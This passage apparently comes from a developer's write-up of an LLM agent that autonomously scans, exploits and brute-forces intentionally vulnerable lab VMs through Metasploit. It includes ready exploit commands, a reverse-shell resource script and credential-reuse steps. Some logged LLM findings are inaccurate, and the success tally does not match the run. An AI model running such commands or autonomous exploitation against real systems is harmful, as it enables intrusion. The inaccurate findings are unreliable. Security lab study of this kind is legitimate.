     │    ├── VulnRAGEngine (rag_engine.py)
     │    ├── NmapTool    (tools.py)
     │    └── WSLTool     (tools.py)
     │
     ├── rag_engine.py    ← ChromaDB + embeddings
     │    ├── chromadb.PersistentClient
     │    └── DefaultEmbeddingFunction (sentence-transformers)
     │
     ├── tools.py         ← WSL command execution
     │    └── subprocess.run(["wsl", "-d", "kali-linux", ...])
     │
     └── cve_research.py  ← HTTP requests to NVD + ExploitDB
          └── requests.get("https://services.nvd.nist.gov/...")

The Streaming Architecture

One of the coolest parts of Phantom Red is watching it work in real time. Here’s how that works:

Python Agent          FastAPI Server       React Frontend
     │                     │                    │
     │  _log("Scanning")   │                    │
     ├────────────────────►│                    │
     │                     │  SSE event         │
     │                     ├───────────────────►│
     │                     │                    │ append to log panel
     │  _log("Found FTP")  │                    │
     ├────────────────────►│                    │
     │                     │  SSE event         │
     │                     ├───────────────────►│

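# api.py: SSE endpoint
import asyncio
import json
from collections import deque

from fastapi import FastAPI
from fastapi.responses import StreamingResponse

app = FastAPI()
log_queue = deque()  # filled by the agent's _log() calls

@app.get("/stream")
async def stream_logs():
    async def event_generator():
        while True:
            if log_queue:
                msg = log_queue.popleft()
                yield f"data: {json.dumps({'msg': msg})}\n\n"
            await asyncio.sleep(0.1)

    return StreamingResponse(event_generator(), media_type="text/event-stream")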
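The wire format is worth seeing on its own: each SSE message is a data: line followed by a blank line. This sketch isolates the framing from FastAPI so it runs anywhere; format_sse and drain are hypothetical helper names.

```python
import json
from collections import deque

def format_sse(payload):
    """Serialize a payload as one Server-Sent Events frame."""
    # json.dumps escapes newlines, so the frame always stays on a single data: line
    return f"data: {json.dumps(payload)}\n\n"

def drain(queue):
    """Yield one SSE frame per queued log message, oldest first."""
    while queue:
        yield format_sse({"msg": queue.popleft()})

log_queue = deque(["Scanning", "Found FTP"])
for frame in drain(log_queue):
    print(repr(frame))
```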

// ui/src/App.jsx — React client
const eventSource = new EventSource('/api/stream');
eventSource.onmessage = (event) => {
    const { msg } = JSON.parse(event.data);
    setLogs(prev => [...prev, msg]);
};

Part 7 — How it Finds Vulnerabilities

The vulnerability discovery pipeline uses three parallel approaches that reinforce each other:

                    TARGET SERVICES
                         │
          ┌──────────────┼──────────────┐
          │              │              │
          ▼              ▼              ▼
    ┌──────────┐   ┌──────────┐   ┌──────────┐
    │ RAG DB   │   │   LIVE   │   │  LIVE    │
    │ (local)  │   │  NVD API │   │ExploitDB │
    │          │   │          │   │          │
    │ 30+ CVEs │   │ NIST DB  │   │ public   │
    │ embedded │   │ CVSS     │   │ exploits │
    │ vectors  │   │ scores   │   │ PoC code │
    └────┬─────┘   └────┬─────┘   └────┬─────┘
         │              │              │
         └──────────────┼──────────────┘
                        │
                        ▼
              ┌──────────────────┐
              │  LLM SYNTHESIS   │
              │                  │
              │  Cross-reference │
              │  all sources     │
              │  Rank by         │
              │  exploitability  │
              └──────────────────┘

Source      Strength                              Weakness
RAG DB      Fast, detailed metadata, offline      Fixed set of CVEs
NVD API     Comprehensive, official CVSS scores   Slow, rate-limited
ExploitDB   Real PoC exploits available           May not have all CVEs

Together, they cover different gaps. The LLM synthesizes all three into a ranked attack plan.

The Semantic Search Advantage

The real power of RAG here is that you don’t need exact matches. Watch what happens when nmap returns “Samba 3.0.20-Debian”:

Query text: "samba 3.0.20 Debian exploit vulnerability"

ChromaDB computes embedding → searches → finds:
  CVE-2007-2447: "Samba 3.0.0 through 3.0.25rc3 usermap_script injection"
  Similarity: 0.89 ✓

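Even though "3.0.20" never appears literally in "3.0.0 through 3.0.25rc3",
the two texts embed close together because they share the product name and
version family. Embeddings don't reason about version ranges, so treat the
match as a strong candidate to verify, not as proof.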

This is the key insight of RAG — it finds contextually similar information, not just exact keyword matches.

Part 8 — How it Executes Exploits

The Execution Engine

All exploits run inside WSL2 Kali Linux. This is the architectural choice that makes everything work on Windows:

┌─────────────────────────────────────────────────────┐
│                    Windows Host                     │
│                                                     │
│  Python Agent ──── subprocess ────► WSL2 Kali      │
│                                          │          │
│                                     ┌───┴───────┐  │
│                                     │           │  │
│                                     │ msfconsole│  │
│                                     │ nmap      │  │
│                                     │ curl      │  │
│                                     │ sshpass   │  │
│                                     │           │  │
│                                     └───────────┘  │
│                                          │          │
│                                     Network         │
│                                          │          │
└──────────────────────────────────────────┼──────────┘
                                           │
                               ┌───────────▼───────────┐
                               │   Target VM           │
                               │   192.168.72.150      │
                               │   Metasploitable 2    │
                               └───────────────────────┘

The Command Flow for a Metasploit Exploit

1. PLANNER builds command from RAG template:
   ─────────────────────────────────────────
   msfconsole -q -x "
     use exploit/unix/ftp/vsftpd_234_backdoor;
     set RHOSTS 192.168.72.150;
     set RPORT 21;
     run;
     exit -y
   "

2. VALIDATE confirms:
   ─────────────────────────────────────────
   ✓ No unresolved placeholders
   ✓ Module is in valid RAG metadata
   ✓ RHOSTS is a valid option for this module
   ✓ exit -y present (prevents hanging)

3. EXECUTE runs via WSL:
   ─────────────────────────────────────────
   subprocess.run([
     "wsl", "-d", "kali-linux", "--", "bash", "-c",
     'msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; ..."'
   ], timeout=120)

4. Output classification:
   ─────────────────────────────────────────
   stdout: "... session 1 opened (192.168.72.1:4444 -> 192.168.72.150:6200)"

   check SUCCESS_PATTERNS:
   ✓ "session \d+ opened" → MATCHED

   Status: SUCCESS
   → Skip remaining exploits, go to CRED_REUSE

Resource Script Pattern (Advanced Exploits)

Some Metasploit modules need complex setup with multi-line configurations. Phantom Red writes these as .rc (resource script) files directly into Kali, then runs them:

# From agents.py — RC_FILE block handling
rc_content = """
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.72.150
set LHOST 192.168.72.1
set LPORT 4444
set PAYLOAD cmd/unix/reverse
run
exit -y
"""

# Write RC file directly to WSL filesystem
wsl.run_command(f'cat > /tmp/exploit_samba.rc << "EOF"\n{rc_content}\nEOF')

# Execute it
wsl.run_command("msfconsole -r /tmp/exploit_samba.rc", timeout=120)

Why use .rc files instead of inline -x commands? Because shell quoting becomes a nightmare when your exploit commands contain quotes, semicolons, and special characters. RC files sidestep the quoting problem entirely.
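Generating the resource script from a module name and an options dict keeps the formatting in one place. A minimal sketch, assuming every script should end with run and exit -y like the example above; build_rc_script is a hypothetical helper.

```python
def build_rc_script(module, options):
    """Render a Metasploit resource script: use, one set per option, run, exit."""
    lines = [f"use {module}"]
    lines += [f"set {name} {value}" for name, value in options.items()]
    lines += ["run", "exit -y"]
    return "\n".join(lines) + "\n"

rc = build_rc_script(
    "exploit/multi/samba/usermap_script",
    {
        "RHOSTS": "192.168.72.150",
        "LHOST": "192.168.72.1",
        "LPORT": 4444,
        "PAYLOAD": "cmd/unix/reverse",
    },
)
print(rc)
```

Because dicts preserve insertion order, the set lines come out in the order you wrote them.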

Part 9 — The UI

Watching it Work in Real Time

The React frontend (ui/src/App.jsx) gives you a real-time window into the agent’s brain:

┌─────────────────────────────────────────────────────────────────┐
│  PHANTOM RED                              [Scan] [Execute]       │
├───────────────────┬─────────────────────────────────────────────┤
│  TARGET INPUT     │  LIVE LOGS                                   │
│                   │                                              │
│  IP: 192.168.72.. │  [RECON] Starting nmap -sV -F -T4...        │
│  Analyst notes:   │  [RECON] Found 23 services                   │
│  [text area]      │  [HTTP] Apache/2.2.8 detected on port 80    │
│                   │  [MSF]  Found: vsftpd_234_backdoor [excel..] │
│  [SCAN]           │  [RAG]  CVE-2011-2523 matched (sim: 0.91)   │
│                   │  [NVD]  Fetching CVE data...                 │
├───────────────────┤  [LLM]  Analyzing attack surface...         │
│  CVE FINDINGS     │  [PLAN] Building exploit sequence...         │
│                   │  [EXEC] Running vsftpd backdoor exploit...   │
│  CVE-2011-2523    │  [EXEC] SUCCESS: session 1 opened!          │
│  CVSS: 10.0       │                                              │
│  Critical         ├─────────────────────────────────────────────┤
│                   │  EXPLOIT PLAN                                │
│  CVE-2007-2447    │                                              │
│  CVSS: 9.0        │  1. msfconsole -q -x "use exploit/unix...   │
│  High             │  2. msfconsole -r /tmp/samba_exploit.rc     │
│                   │                                              │
└───────────────────┴─────────────────────────────────────────────┘

The key technology here is Server-Sent Events (SSE) — a one-way stream from the server to the browser. The agent logs every step via self._log(msg), which pushes to a queue. The SSE endpoint drains that queue to the browser.
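The queue-to-stream hand-off can be sketched with the standard library alone. This is an illustration, not the project's endpoint: `format_sse`, `drain`, and the `None` sentinel are assumptions of mine. The only part taken from a standard is the frame layout (a `data:` field followed by a blank line).

```python
import queue

def format_sse(message):
    """Encode one log message as a Server-Sent Events frame."""
    # Each payload line gets its own 'data:' field; a blank line ends the event.
    lines = message.splitlines() or [""]
    return "".join(f"data: {line}\n" for line in lines) + "\n"

def drain(log_queue, sentinel=None):
    """Yield SSE frames until the sentinel object is pulled from the queue."""
    while True:
        item = log_queue.get()   # blocks until the agent logs something
        if item is sentinel:
            break
        yield format_sse(item)

# Simulate the agent pushing two log lines, then signalling completion
log_queue = queue.Queue()
for msg in ["[RECON] Starting scan", "[EXEC] done", None]:
    log_queue.put(msg)

frames = list(drain(log_queue))
```

In a FastAPI app, a generator like `drain` would typically be wrapped in a `StreamingResponse` with `media_type="text/event-stream"`, and the browser would read it with `EventSource`.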

Key Libraries Explained

Library	What it Does	Why Used Here
langchain	LLM abstraction layer	Unified interface for prompts, chains, and models
langchain-ollama	Ollama LLM connector	Runs LLM locally — no API keys, no cloud
langgraph	Agent state machine	Deterministic, debuggable agent flow
chromadb	Embedded vector database	Persistent RAG storage, runs in-process
sentence-transformers	Text embeddings	Converts text → semantic vectors for similarity search
fastapi	REST API framework	Async Python web server with auto-docs
uvicorn	ASGI server	Runs FastAPI with async support
requests	HTTP client	CVE lookups from NVD/ExploitDB
python-nmap	Nmap Python wrapper	Network scanning (raw nmap output is also used)
react + vite	Frontend framework	Fast dev server, component-based UI
framer-motion	React animations	Smooth UI transitions
tailwindcss	CSS utility framework	Fast styling without writing CSS

How it All Comes Together — The Mental Model

        ┌─────────────────────────────────────────────┐
        │                                             │
        │  PHANTOM RED is a student who:             │
        │                                             │
        │  1. Reads the exam (RECON)                 │
        │                                             │
        │  2. Checks the textbook (RAG)              │
        │     "I've seen vsftpd 2.3.4 before..."     │
        │                                             │
        │  3. Googles for new info (NVD/ExploitDB)  │
        │                                             │
        │  4. Thinks about the answer (LLM)          │
        │     "Best approach is probably X..."        │
        │                                             │
        │  5. Writes the answer (PLANNER)            │
        │                                             │
        │  6. Checks their work (VALIDATE)           │
        │                                             │
        │  7. Submits (EXECUTE)                      │
        │                                             │
        │  8. Uses what they learned (CRED_REUSE)   │
        │                                             │
        └─────────────────────────────────────────────┘

The LangGraph StateGraph is the skeleton that connects these steps.
The RAG database is the textbook the agent can consult.
The LLM is the reasoning engine that makes decisions.
The tools are the hands that take real actions.

Lessons Learned

Building Phantom Red taught me a lot about what makes AI agents actually work in practice:

1. LLMs hallucinate — RAG doesn’t

When I first built this with just an LLM, it would confidently generate Metasploit commands with wrong option names. CMD= when the module needs PAYLOAD=. Wrong port numbers. Invalid module paths.

Adding RAG with validated metadata stopped this cold. Now the LLM suggests the attack vector, but the actual command comes from a pre-verified template.

2. State machines beat ReAct loops for deterministic tasks

LangGraph’s explicit state graph was a better fit than a ReAct (reason + act) loop for this use case. Each step has a clear input and output, making it easy to debug (“why did PLANNER emit this command?”) and safe to reason about.
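The idea of an explicit state graph can be shown without LangGraph at all. The sketch below is a plain-Python stand-in, not LangGraph's API: each node is a function that mutates a shared state dict and names its successor. The node names echo the pipeline, but the bodies and data are placeholders.

```python
def recon(state):
    state["services"] = ["ftp:21", "ssh:22"]          # placeholder scan result
    return "plan"

def plan(state):
    state["commands"] = [f"check {svc}" for svc in state["services"]]
    state["commands"].append("login {username}")      # deliberately unresolved
    return "validate"

def validate(state):
    # Drop any command that still carries a template placeholder
    state["commands"] = [c for c in state["commands"] if "{" not in c]
    return "done"

NODES = {"recon": recon, "plan": plan, "validate": validate}

def run(start, state):
    """Walk the graph from `start`, recording which nodes ran, in order."""
    trace, node = [], start
    while node != "done":
        trace.append(node)
        node = NODES[node](state)
    return trace

state = {}
trace = run("recon", state)
```

Because every transition is an explicit return value, the trace answers "which node produced this?" directly, which is the debuggability argument made above.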

3. Analyst-in-the-loop is the killer feature

The ability for a human to paste notes (“try CVE-2002-0082, I already have a shell waiting on port 4444”) and have those treated as highest priority dramatically increased practical utility. The AI’s job changed from “figure everything out” to “fill in gaps around what the human knows.”

4. Prompt engineering is everything

The difference between the LLM giving useful ranked attack vectors vs. rambling prose came down entirely to the prompt structure. Breaking the prompt into clearly labeled sections (SERVICES, VULNERABILITIES, MSF MODULES, ANALYST NOTES) with explicit instructions about output format made a 10x difference.
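A sectioned prompt of this kind might be assembled as follows. The four section names come from the paragraph above. The function name `build_prompt`, the `###` markers, and the wording of the output-format instruction are assumptions for illustration, not the project's actual prompt.

```python
def build_prompt(services, vulnerabilities, msf_modules, analyst_notes=""):
    """Assemble a prompt from clearly labeled sections plus a format rule."""
    sections = [
        ("SERVICES", services),
        ("VULNERABILITIES", vulnerabilities),
        ("MSF MODULES", msf_modules),
        ("ANALYST NOTES", [analyst_notes] if analyst_notes else ["(none)"]),
    ]
    parts = []
    for title, items in sections:
        body = "\n".join(f"- {item}" for item in items)
        parts.append(f"### {title}\n{body}")
    # Explicit output contract: this is what keeps the answer from rambling
    parts.append(
        "### OUTPUT FORMAT\n"
        "Return a numbered list of at most 3 attack vectors, one per line."
    )
    return "\n\n".join(parts)

prompt = build_prompt(
    services=["21/tcp ftp vsftpd 2.3.4"],
    vulnerabilities=["CVE-2011-2523"],
    msf_modules=["exploit/unix/ftp/vsftpd_234_backdoor"],
)
```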

5. Timeouts are non-negotiable

Msfconsole can hang indefinitely waiting for a connection that never comes. Without aggressive timeout handling (30s for quick checks, 120s for standard exploits, 180s for background jobs), the agent would freeze on the first failed exploit.
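A hedged sketch of tiered timeouts using `subprocess.run`. The three durations are the ones quoted above. The tier names, `run_with_timeout`, and the result dict are hypothetical, and a short-lived Python child process stands in for msfconsole so the example can run anywhere.

```python
import subprocess
import sys

# Seconds per tier, as quoted in the text; the tier names are illustrative
TIMEOUTS = {"quick": 30, "standard": 120, "background": 180}

def run_with_timeout(argv, timeout):
    """Run a command; report a timeout instead of blocking forever."""
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
        return {"status": "done", "returncode": proc.returncode, "output": proc.stdout}
    except subprocess.TimeoutExpired:
        # subprocess.run kills the child before raising, so nothing is left hanging
        return {"status": "timeout", "returncode": None, "output": ""}

# Stand-in for a hung process: sleeps far longer than the timeout allows
slow = [sys.executable, "-c", "import time; time.sleep(5)"]
result = run_with_timeout(slow, timeout=0.5)
print(result["status"])
```

Returning a status rather than raising lets the caller record the failure and move on to the next command.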

Tech Stack Summary

Backend:
  Language:   Python 3.11
  Agent:      LangGraph + LangChain
  LLM:        Qwen 2.5 Coder via Ollama (local)
  RAG:        ChromaDB + sentence-transformers
  API:        FastAPI + Uvicorn
  Security:   nmap, Metasploit (via WSL2 Kali)
  CVEs:       NVD API + ExploitDB

Frontend:
  Framework:  React 18 + Vite
  Styling:    Tailwind CSS
  Animation:  Framer Motion
  Icons:      Lucide React
  Streaming:  Server-Sent Events (SSE)

Infrastructure:
  Runtime:    Windows 11 + WSL2 Kali Linux
  LLM Server: Ollama (localhost:11434)

What’s Next

Live Example — Auto-Exploiting Metasploitable 2

This is a real run of Phantom Red against Metasploitable 2 (192.168.72.150), a purposely vulnerable Linux VM designed for security practice. The Kali attacker machine is at 172.28.255.59.

Setup

# Terminal 1 — Backend
venv\Scripts\activate
python api.py
# FastAPI server starts on http://localhost:8000

# Terminal 2 — Frontend
cd ui
npm run dev
# React dev server starts on http://localhost:5173

Open your browser to http://localhost:5173, enter the target IP and Kali IP, then click Initiate Agent.

What Phantom Red Did (Step by Step)

Step 1 — RECON: nmap Discovers 18 Open Services

The first thing the agent does is fire an nmap -sV -T4 scan. Metasploitable 2 is intentionally wide open:

PORT     STATE  SERVICE      VERSION
21/tcp   open   ftp          vsftpd 2.3.4
22/tcp   open   ssh          OpenSSH 4.7p1 Debian 8ubuntu1
23/tcp   open   telnet       Linux telnetd
25/tcp   open   smtp         Postfix smtpd
53/tcp   open   domain       ISC BIND 9.4.2
80/tcp   open   http         Apache httpd 2.2.8 (Ubuntu) DAV/2
111/tcp  open   rpcbind      2 (RPC #100000)
139/tcp  open   netbios-ssn  Samba smbd 3.X - 4.X
445/tcp  open   netbios-ssn  Samba smbd 3.X - 4.X
513/tcp  open   login
2049/tcp open   nfs
2121/tcp open   ftp          ProFTPD 1.3.1
3306/tcp open   mysql        MySQL 5.0.51a
5432/tcp open   postgresql   PostgreSQL 8.3.0
5900/tcp open   vnc          VNC protocol 3.3
6000/tcp open   x11
8009/tcp open   ajp13
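Turning a table like this into structured data is straightforward. The sketch below uses a plain regular expression on the text output. It is one possible approach, not necessarily how the agent or python-nmap does it, and `parse_nmap_table` is a hypothetical name.

```python
import re

# port/proto, state, service name, optional free-text version
LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap_table(text):
    """Extract open services from nmap's human-readable port table."""
    services = []
    for raw in text.splitlines():
        match = LINE.match(raw.strip())
        if match and match.group(3) == "open":
            port, proto, _state, name, version = match.groups()
            services.append({
                "port": int(port),
                "proto": proto,
                "service": name,
                "version": version.strip(),   # empty when nmap shows no version
            })
    return services

sample = """PORT     STATE  SERVICE      VERSION
21/tcp   open   ftp          vsftpd 2.3.4
513/tcp  open   login
"""
services = parse_nmap_table(sample)
```

For anything beyond a quick sketch, nmap's XML output (`-oX`) is a more robust source than the column-aligned text.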

Step 2 — FINGERPRINT: HTTP and SMB Deep Dive

http://192.168.72.150:80
  Server:     Apache/2.2.8 (Ubuntu) DAV/2
  Powered-By: PHP/5.2.4-2ubuntu5.10
  CMS:        phpmyadmin

✔ SMB version detected: Samba 3.0.20

This is critical — Samba 3.0.20 falls exactly in the vulnerable range for CVE-2007-2447 (the usermap_script RCE).

Step 3 — MSF_SEARCH: 206 Metasploit Modules Discovered

The agent queries msfconsole search for every detected service and version string. Some highlights:

vsftpd  → exploit/unix/ftp/vsftpd_234_backdoor        [excellent]
samba   → exploit/multi/samba/usermap_script           [excellent]
php     → exploit/multi/http/php_cgi_arg_injection     [excellent]
mysql   → exploit/multi/mysql/mysql_udf_payload        [great]

206 unique modules discovered in total — the agent doesn’t try all of them. The RAG and validation layers cut that down to what actually applies.

Step 4 — RESEARCH: RAG Matches 16 Validated Exploits

The ChromaDB semantic search matches services to the pre-embedded vulnerability knowledge base. Key matches:

RAG ID	Module	Port	Notes
CVE-2011-2523	`exploit/unix/ftp/vsftpd_234_backdoor`	21	vsftpd 2.3.4 backdoor
CVE-2007-2447	`exploit/multi/samba/usermap_script`	139	Samba username map script RCE
CVE-2010-4221	`exploit/unix/ftp/proftpd_133c_backdoor`	2121	ProFTPD backdoor
MYSQL-UDF	`exploit/multi/mysql/mysql_udf_payload`	3306	MySQL UDF RCE
POSTGRES-DEFAULT	`exploit/linux/postgres/postgres_payload`	5432	PostgreSQL execution
SSH-BRUTE	`auxiliary/scanner/ssh/ssh_login`	22	Credential brute-force
VNC-DEFAULT	`auxiliary/scanner/vnc/vnc_login`	5900	VNC default password check
CVE-2017-0144	`exploit/windows/smb/ms17_010_eternalblue`	445	EternalBlue (queued, wrong OS)

Step 5 — CVE_INTEL: 26 CVEs Fetched from NVD + ExploitDB

The agent queries the NVD API and ExploitDB for each detected service — read-only, no execution. Results appear in the CVE Intelligence panel in the UI for analyst review:

CVE-2011-2523  ftp:21      ← vsftpd backdoor
CVE-2014-6271  http:80     ← Shellshock
CVE-2017-0144  smb:445     ← EternalBlue
CVE-2010-4221  ftp:21      ← ProFTPD
CVE-2007-2447  samba:139   ← Samba usermap_script
CVE-2012-4879  telnet:23
CVE-2017-9482  telnet:23
... (26 total)

This data reaches the LLM’s analysis context only when the analyst pastes relevant findings into the Analyst Notes field; otherwise it stays in the UI as reference material.

Step 6 — ANALYZE: LLM Ranks the Attack Surface

1. Telnet (Port 23)
   - CVSS: High (9.8)
   - ExploitDB ID: EDB-2
   - Description: Multiple critical vulnerabilities in Linux telnetd.
   - RAG Matched Exploit: [CRED-REUSE-TELNET] auxiliary/scanner/telnet/telnet_login
   - Metasploit Search Result: exploit/linux/local/telnetdxtermbash_exec (CVE-2016-5791)

2. FTP (Port 21)
   - CVSS: High (9.4)
   - ExploitDB ID: EDB-3
   - Description: Use-after-free vulnerability in the Response API.
   - RAG Matched Exploits:
     - [CVE-2011-2523] exploit/unix/ftp/vsftpd_234_backdoor
     - [FTP-ANON-DATA] auxiliary/scanner/ftp/ftp_version
     - [CVE-2017-7418] exploit/multi/http/proftpdmodcopy_exec
   - Metasploit Search Result: exploit/unix/ftp/vsftpd_234_backdoor

3. MySQL (Port 3306)
   - CVSS: High (5.0)
   - ExploitDB ID: EDB-1
   - Description: Multiple vulnerabilities in MySQL.
   - RAG Matched Exploit: [MYSQL-UDF] exploit/multi/mysql/mysql_udf_payload
   - Metasploit Search Result: exploit/unix/mysql/mysql_udf_payload

Step 7 — PLANNER: 19 Commands Assembled

The planner combines RAG templates (highest trust) with LLM suggestions (creative, needs validation):

Priority breakdown:
  0  analyst-priority commands   (none pasted this run)
  3  LLM-suggested commands
  16 RAG template commands
  ─────────────────────────────
  19 total

The LLM suggested exploit/unix/ftp/vsftpd_234_backdoor — but it was already in the RAG plan, so the duplicate was dropped.
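The merge-and-deduplicate step can be sketched in a few lines. The ordering used here (analyst first, then RAG, then LLM) is my assumption based on the trust levels described above, and `merge_plan` is a hypothetical name. `exploit/example/llm_only` is a made-up entry standing in for an LLM suggestion that RAG did not have.

```python
def merge_plan(analyst, rag, llm):
    """Merge command sources in priority order, keeping the first copy of each."""
    plan, seen = [], set()
    for source, modules in (("analyst", analyst), ("rag", rag), ("llm", llm)):
        for module in modules:
            if module in seen:
                continue          # a higher-priority source already queued it
            seen.add(module)
            plan.append((source, module))
    return plan

plan = merge_plan(
    analyst=[],
    rag=["exploit/unix/ftp/vsftpd_234_backdoor", "auxiliary/scanner/ssh/ssh_login"],
    llm=["exploit/unix/ftp/vsftpd_234_backdoor", "exploit/example/llm_only"],
)
```

Keeping the first occurrence means a duplicate suggested by the LLM never replaces the RAG entry, so the pre-verified template is the one that survives.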

Step 8 — VALIDATE: 17 Commands Cleared, 2 Blocked

✔ exploit/unix/ftp/vsftpd_234_backdoor           — cleared
✔ auxiliary/scanner/ftp/anonymous                 — cleared
✔ auxiliary/scanner/ssh/ssh_login                 — cleared
✔ exploit/multi/samba/usermap_script              — cleared
✘ auxiliary/scanner/telnet/telnet_login           — BLOCKED (unresolved {username}/{password} placeholders)
✘ auxiliary/scanner/smb/smb_enumshares            — BLOCKED (version mismatch: requires Samba 4.x, target is 3.0.20)
~ exploit/linux/http/cisco_prime_inf_rce          — passed through (unknown module, placeholder fix applied)
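The placeholder check that blocked telnet_login can be approximated with a regular expression. This is a sketch of that single rule only. The function names and the exact command strings are illustrative, and the real validator also performs version checks that are not shown here.

```python
import re

# Matches template slots such as {username} or {password}
PLACEHOLDER = re.compile(r"\{([A-Za-z_][A-Za-z0-9_]*)\}")

def unresolved_placeholders(command):
    """Return the names of any template slots still present in a command."""
    return PLACEHOLDER.findall(command)

def validate(commands):
    """Split commands into cleared ones and blocked ones (with the reason)."""
    cleared, blocked = [], []
    for command in commands:
        missing = unresolved_placeholders(command)
        if missing:
            blocked.append((command, missing))
        else:
            cleared.append(command)
    return cleared, blocked

cleared, blocked = validate([
    "use auxiliary/scanner/ftp/anonymous; set RHOSTS 192.168.72.150",
    "use auxiliary/scanner/telnet/telnet_login; set USERNAME {username}; set PASSWORD {password}",
])
```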

Step 9 — EXECUTE: Shell Obtained in 5 Commands

The agent runs commands sequentially, stopping the moment it gets a shell. It only needed 5 out of 17:

[1] exploit/unix/ftp/vsftpd_234_backdoor    ✘ FAIL   — payload mismatch, default payload override conflict
[2] auxiliary/scanner/ftp/anonymous          ✔ SUCCESS — FTP anonymous READ access confirmed (vsftpd 2.3.4)
[3] FTP directory traversal via curl         ⚠ ERROR  — empty directory listing
[4] Shellshock probe on /cgi-bin/status      ? UNKNOWN — 404, CGI not present
[5] auxiliary/scanner/ssh/ssh_login          ✔ SUCCESS — msfadmin:msfadmin cracked!
    🎯 SHELL OBTAINED — skipping remaining 12 commands

The SSH brute-force hit on msfadmin:msfadmin — a classic Metasploitable default credential. Session opened:

[+] 192.168.72.150:22 - Success: 'msfadmin:msfadmin'
    uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),...
    Linux metasploitable 2.6.24-16-server #1 SMP Mon Apr 10 13:58:00 UTC 2008
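The stop-at-first-shell behaviour amounts to a loop with an early exit. In this sketch the `"SHELL"` status and the `runner` callback are hypothetical stand-ins. The real agent decides success by parsing tool output, which is not reproduced here.

```python
def run_until_shell(commands, runner):
    """Run commands in order; stop as soon as one reports a shell.

    Returns the per-command results and how many commands were skipped.
    """
    results = []
    for index, command in enumerate(commands):
        status = runner(command)
        results.append((command, status))
        if status == "SHELL":
            return results, len(commands) - index - 1
    return results, 0

# Fake runner: 17 queued commands, the fifth one yields a shell
commands = [f"cmd-{n}" for n in range(1, 18)]
fake_runner = lambda command: "SHELL" if command == "cmd-5" else "FAIL"
results, skipped = run_until_shell(commands, fake_runner)
```

With these inputs the loop executes five commands and skips twelve, matching the counts in the run above.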

Step 10 — CRED_REUSE: Credentials Validated Across All Protocols

With msfadmin:msfadmin in hand, the agent tests the credentials against every authentication service it discovered, in this case SSH and Telnet:

[CRED-REUSE] msfadmin:msfadmin
  ✔ SSH    → LOGIN OK  (session opened, id/whoami confirmed)
  ✔ Telnet → LOGIN OK  (shell session opened)

[CRED-REUSE] msfadmin;:msfadmin   (second variant from ssh_login output)
  ✔ SSH    → LOGIN OK
  ✔ Telnet → LOGIN OK

6 attempts total — 6 successful.

┌────────────────────────────────────────┐
│  CREDENTIAL ACCESS          1 VERIFIED │
│                                        │
│  msfadmin : msfadmin  [LOGIN OK]       │
│  via SSH login                         │
└────────────────────────────────────────┘

Final Result

╔══════════════════════════════════════╗
║   TARGET COMPROMISED                 ║
║   7 VECTORS SUCCESSFUL               ║
║                                      ║
║   Target:  192.168.72.150            ║
║   Outcome: Shell + 2 verified creds  ║
║   Time:    ~4 minutes                ║
╚══════════════════════════════════════╝

The entire pipeline — scan, research, plan, validate, exploit, credential reuse — ran autonomously. The human’s only job was to click Initiate Agent and watch.

Key Takeaways From This Run

Observation	Why It Matters
vsftpd backdoor failed due to payload conflict	Shows why VALIDATE alone isn’t enough: some failures only surface at runtime
SSH brute-force succeeded before Samba RCE ran	The agent stops at first success: no wasted exploitation
Samba `smb_enumshares` was blocked by validator	Version-aware RAG filtering saved time and prevented false-positive noise
Credentials reused across SSH + Telnet	One cracked password → full access to multiple services
26 CVEs fetched for analyst review	Human-in-the-loop CVE research panel provides context even when not injected

Live Example 2 — Auto-Exploiting Kioptrix Level 1

This is a second real run, this time against Kioptrix Level 1 (192.168.36.128) — a classic beginner CTF VM. Unlike Metasploitable 2, Kioptrix has only 5 open ports and no default credentials to fall back on. The agent has to exploit the software itself.

Target Profile

Host:    192.168.36.128   (Kioptrix Level 1)
Kali:    172.28.255.59
OS:      Red Hat Linux (circa 2001)

What Phantom Red Did (Step by Step)

Step 1 — RECON: 5 Open Ports, Vintage Software Stack

PORT    STATE  SERVICE      VERSION
22/tcp  open   ssh          OpenSSH 2.9p2 (protocol 1.99)
80/tcp  open   http         Apache/1.3.20 (Unix) (Red-Hat/Linux)
                             mod_ssl/2.8.4 OpenSSL/0.9.6b
111/tcp open   rpcbind      2 (RPC #100000)
139/tcp open   netbios-ssn  Samba smbd (workgroup: MYGROUP)
443/tcp open   ssl/https    Apache/1.3.20 (Unix) (Red-Hat/Linux)
                             mod_ssl/2.8.4 OpenSSL/0.9.6b

Only 5 ports — a much tighter attack surface than Metasploitable 2. But the software versions are ancient: Apache 1.3.20, OpenSSL 0.9.6b, OpenSSH 2.9p2. These are 2001-era builds with well-known critical CVEs.

Step 2 — FINGERPRINT: Two HTTP Endpoints + Samba 2.2.1a

http://192.168.36.128:80
  Server:   Apache/1.3.20 (Unix) (Red-Hat/Linux)
            mod_ssl/2.8.4 OpenSSL/0.9.6b
  Frameworks: Apache

https://192.168.36.128:443
  (no additional headers exposed)

SMB: Samba 2.2.1a  ← critical finding

Samba 2.2.1a is in the vulnerable range for exploit/linux/samba/trans2open (CVE-2003-0201), a classic buffer overflow that yields root.

Step 3 — MSF_SEARCH: 52 Modules Found

With only 5 services to search against, the module count is much lower than Metasploitable 2 — 52 vs 206. Quality over quantity: the agent narrows in on what actually matters.

ssh    → auxiliary/scanner/ssh/ssh_login                [excellent]
samba  → exploit/multi/samba/usermap_script             [excellent]
http   → exploit/multi/http/apache_normalize_path_rce   [excellent]

Step 4 — RESEARCH: 7 RAG Exploits Matched

The ChromaDB semantic search returns 7 validated matches. Two are immediately notable:

RAG ID	Module	Port	Notes
CVE-2002-0082	`exploit/unix/remote/openfuck`	443	mod_ssl OpenFuck buffer overflow
CVE-2014-0160	`auxiliary/scanner/ssl/openssl_heartbleed`	443	Heartbleed
CVE-2003-0201	`exploit/linux/samba/trans2open`	139	Samba 2.2.x buffer overflow
CVE-2014-6271	`exploit/multi/http/apache_mod_cgi_bash_env_exec`	80	Shellshock
SSH-BRUTE	`auxiliary/scanner/ssh/ssh_login`	22	Credential brute-force
HTTP-ENUM	`auxiliary/scanner/http/dir_scanner`	80	Directory scan
HTTP-INFO	`auxiliary/scanner/http/http_version`	80	Server banner grab

